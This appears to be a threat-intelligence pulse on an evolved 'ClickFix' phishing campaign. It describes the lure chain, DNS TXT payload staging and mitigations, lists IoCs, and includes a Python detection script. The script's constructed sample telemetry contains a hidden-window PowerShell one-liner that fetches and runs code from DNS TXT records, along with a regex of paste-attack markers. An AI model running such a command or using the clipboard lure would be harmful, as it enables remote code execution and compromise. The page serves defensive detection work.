PHISH ALERT: From a Simple Phishing Email to a Full Attack Arsenal: The Evolution of "ClickFix"
This is a phishing campaign tracked as an evolution of "ClickFix". It relies on social engineering and victim-assisted execution to get past endpoint controls rather than on any software vulnerability. The emails carry an urgent OneDrive document lure with a ZIP attachment; the ZIP contains an LNK shortcut that opens an attacker-controlled landing page. That page silently copies a PowerShell command into the victim's clipboard, and the victim is then talked into pasting and running it through the Run dialog (Win+R). Because the user, not a macro or an exploit, launches the command, attachment and sandbox filters that look for a malicious executable never fire. The PowerShell stage pulls follow-on payloads from DNS TXT records instead of over HTTP, which sidesteps web-proxy inspection, and delivers obfuscated scripts, fake MSI installers posing as legitimate software, and ISO images carrying spyware for persistent access. The goal is long-term post-compromise control of the environment, not a one-off theft.
AI Analysis
Technical Summary
The chain is: ZIP attachment, LNK shortcut inside it, attacker-controlled landing page, clipboard injection, manual execution. The landing page writes a PowerShell command into the clipboard without any visible prompt, then instructs the target to open the Run dialog (Win+R), paste, and press Enter. The resulting process is a shell started by explorer.exe under the user's own account, which looks like routine interactive activity to controls keyed on documents, macros or exploits. The first-stage script stages later payloads through DNS TXT records, so the download never appears as an HTTP request and evades proxies and URL filters that only inspect web traffic. Observed components include obfuscated scripts, fake MSI installers posing as legitimate Remote Monitoring and Management (RMM) tools such as ConnectWise, and ISO images containing spyware used to maintain persistent access. Taken together, the tooling is built for standing control of the compromised environment rather than a single smash-and-grab, which is the strategic shift the campaign represents.
Potential Impact
Because the user launches the first stage personally, attachment sandboxing, macro blocking and exploit mitigations never engage. The outcomes are credential harvesting, spyware installation, and persistent remote access through a rogue RMM agent. DNS TXT staging evades network controls that only inspect HTTP(S), and MSI packages that mimic legitimate software plus obfuscated scripts raise the cost of detection and clean-up. The net effect is durable attacker control over the compromised environment, which makes this a significant risk for any organization whose staff can be reached by email.
Mitigation Recommendations
No patch applies: the campaign exploits user behaviour, not a software flaw, so the controls are preventive, detective and forensic.
- Mail: quarantine ZIP attachments that contain LNK files; the ZIP-wrapped shortcut is the first hop in this chain and has little legitimate use in inbound mail.
- Endpoint: alert on explorer.exe spawning powershell.exe, cmd.exe or mshta.exe with a hidden-window, encoded-command or Invoke-Expression style command line, which is exactly what a Win+R paste produces. Where users have no business need for the Run dialog, the Explorer policy "Remove Run menu from Start Menu" (NoRun) removes the Win+R path entirely. Restrict MSI installation and RMM agents with AppLocker or WDAC so a look-alike ConnectWise package cannot install, and turn on PowerShell Script Block Logging (event 4104) so the pasted one-liner is recorded even when no file ever touches disk.
- Network: log DNS query types and alert on bursts of TXT lookups to domains the fleet has never resolved before, since the stager fetches its next stage from TXT records rather than over HTTP. Block the IoC domains listed below.
- Forensics: the Run dialog keeps recent commands under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so a pasted command survives there after the console closes; check that key, the 4104 events and any newly installed MSI or mounted ISO on a suspect host.
- Users: train staff that no legitimate document or "fix" ever asks them to paste a command into Run. That single action is the behaviour the whole chain depends on.
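The following Python triage script is an added example written for this page; it is not code from the pulse, from AlienVault or from KnowBe4. It implements the three checks above, the explorer.exe-to-shell process pattern from the Technical Summary, the TXT-burst DNS pattern, and the RunMRU artefact, over constructed telemetry. The process events, the *.example domain names, the baseline set and the RunMRU export are all made up for the example; the paste-marker regex is a starting heuristic to tune against your own baseline; the only real data it uses are the three IoC domains listed below.

```python
"""ClickFix-style triage over constructed telemetry (added example; not from the pulse).

Checks: (1) process creation: explorer.exe spawning a shell with a pasted-looking
command line, which is what a Win+R paste produces; (2) resolver logs: TXT-query
bursts to domains the fleet has never queried, plus any query touching the pulse's
IoC domains; (3) the RunMRU registry key, where the Run dialog keeps recent commands.
Sample events, *.example domain names and the baseline set are all constructed.
"""
import re
from collections import Counter

# Markers typical of pasted one-liners: hidden window, IEX, encoded command,
# TXT-record lookups and base64 decoding. Heuristic: tune against your baseline.
PASTE_RE = re.compile(
    r"-w(?:indowstyle)?\s+h(?:idden)?"
    r"|\biex\b|invoke-expression"
    r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|nslookup\b.*-(?:q|type)=txt|resolve-dnsname\b.*-type\s+txt"
    r"|frombase64string",
    re.IGNORECASE,
)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Domains listed as IoCs in this pulse (the only real data in the example).
IOC_DOMAINS = {"italy-news.info", "lootrioya.info", "document-auth.icu"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def flag_process_events(events):
    """Return (ProcessId, CommandLine) for shells launched from explorer.exe
    (the parent of anything started via the Run dialog) whose command line
    carries paste-style markers. Other parents are ignored to keep noise down."""
    hits = []
    for ev in events:
        if _basename(ev["Image"]) not in SHELLS:
            continue
        if _basename(ev["ParentImage"]) != "explorer.exe":
            continue
        if PASTE_RE.search(ev["CommandLine"]):
            hits.append((ev["ProcessId"], ev["CommandLine"]))
    return hits


def _parent_domain(name):
    # Last two labels: crude without a public-suffix list, but enough for triage.
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def flag_txt_bursts(dns_events, known_domains, threshold=3):
    """Count TXT queries per parent domain, skipping domains already in the fleet
    baseline (SPF/DMARC/DKIM make TXT lookups routine for mail domains). A payload
    chunked across several TXT records shows up as a burst to one new domain."""
    counts = Counter(
        _parent_domain(ev["QueryName"])
        for ev in dns_events
        if ev["QueryType"] == "TXT"
        and _parent_domain(ev["QueryName"]) not in known_domains
    )
    return {d: n for d, n in counts.items() if n >= threshold}


def match_ioc_domains(dns_events, ioc_domains=IOC_DOMAINS):
    """Any query for an IoC domain or a subdomain of one, regardless of type."""
    hits = set()
    for ev in dns_events:
        name = ev["QueryName"].lower().rstrip(".")
        if any(name == d or name.endswith("." + d) for d in ioc_domains):
            hits.add(name)
    return sorted(hits)


def parse_runmru(values):
    """values: RunMRU value name -> data, as exported from
    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU.
    Each entry ends in a literal backslash-1; MRUList orders them most-recent
    first. Returns [(command, suspicious)] in that order."""
    out = []
    for name in values.get("MRUList", ""):
        cmd = values.get(name, "")
        if cmd.endswith("\\1"):
            cmd = cmd[:-2]
        out.append((cmd, bool(PASTE_RE.search(cmd))))
    return out


# --- constructed sample telemetry (not real events) ------------------------
PASTED = 'powershell -w hidden -c "iex (nslookup -type=txt t1.cfg-sync.example | Select-String ...)"'
PROCESS_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": PASTED},
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe /c ipconfig /all"},
    {"ProcessId": 4200, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"powershell -w hidden -File C:\ops\backup.ps1"},  # scheduled task, not flagged
]
DNS_EVENTS = [
    {"QueryName": "t1.cfg-sync.example", "QueryType": "TXT"},
    {"QueryName": "t2.cfg-sync.example", "QueryType": "TXT"},
    {"QueryName": "t3.cfg-sync.example", "QueryType": "TXT"},
    {"QueryName": "_dmarc.example.com", "QueryType": "TXT"},  # routine mail lookup
    {"QueryName": "document-auth.icu", "QueryType": "A"},      # pulse IoC
]
KNOWN_DOMAINS = {"example.com", "microsoft.com"}
RUNMRU = {"MRUList": "cab", "a": "notepad\\1", "b": "\\\\fs01\\share\\1", "c": PASTED + "\\1"}

if __name__ == "__main__":
    print("process:", flag_process_events(PROCESS_EVENTS))
    print("txt bursts:", flag_txt_bursts(DNS_EVENTS, KNOWN_DOMAINS))
    print("ioc domains:", match_ioc_domains(DNS_EVENTS))
    print("RunMRU:", parse_runmru(RUNMRU))
```

Two design points. Restricting the process rule to an explorer.exe parent is deliberate: the same hidden-window PowerShell launched by a scheduled task or a management agent is usually benign, and the Run dialog always parents the shell under explorer.exe; the cost is that a variant which re-launches through another parent needs a separate rule. For the DNS rule, the baseline set matters more than the threshold, because SPF, DMARC and DKIM checks generate steady TXT traffic for every mail domain an organization talks to; the rule only fires on a new parent domain, which is what a freshly registered staging domain looks like.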
Indicators of Compromise
- domain: italy-news.info
- domain: lootrioya.info
- domain: document-auth.icu
File hashes (digest type inferred from length; the pulse does not say which digests belong to the same file):
- hash (SHA-256): 7b7981c99d59595fe15377df84695bb72ce0b85560a3935f930657b2d162e5ef
- hash (SHA-256): adcd15f3d6b87f84d106ea426fa824fd20c9d64f6d199ce92580884290785f30
- hash (SHA-256): d7d2f0ee187549f3f4a114d716be12521fbf62d6d26e2ac23d2a32d521d08fd8
- hash (MD5): 79e205576bdad2cce593ae850b0c9e31
- hash (MD5): e5989c374fa9cb1bc53b202032257a3c
- hash (MD5): 7596699747d2b284df77d2c83714aa00
- hash (SHA-1): 5442dea013b109ac4d0cdc52248b758a6cb9684c
- hash (SHA-1): e46d05b8aa8f1b1a5e81da2ebe2bf8e94cbe85fe
- hash (SHA-1): 5cf01e24f6bafa64815d1bd2f3323ea091d504cc
Technical Details
- Author: AlienVault
- TLP: white
- References: https://x.com/Kb4Threatlabs/status/2069057429514731609
- Adversary: null (not attributed in the pulse)
- Pulse Id: 6a3a7809c43cfba36348ed9d
- Threat Score: null (not set)
Threat ID: 6a3ad9daeed863c81e7e613b
Added to database: 06/23/2026, 19:09:14 UTC
Last enriched: 06/23/2026, 19:24:26 UTC
Last updated: 06/23/2026, 20:51:15 UTC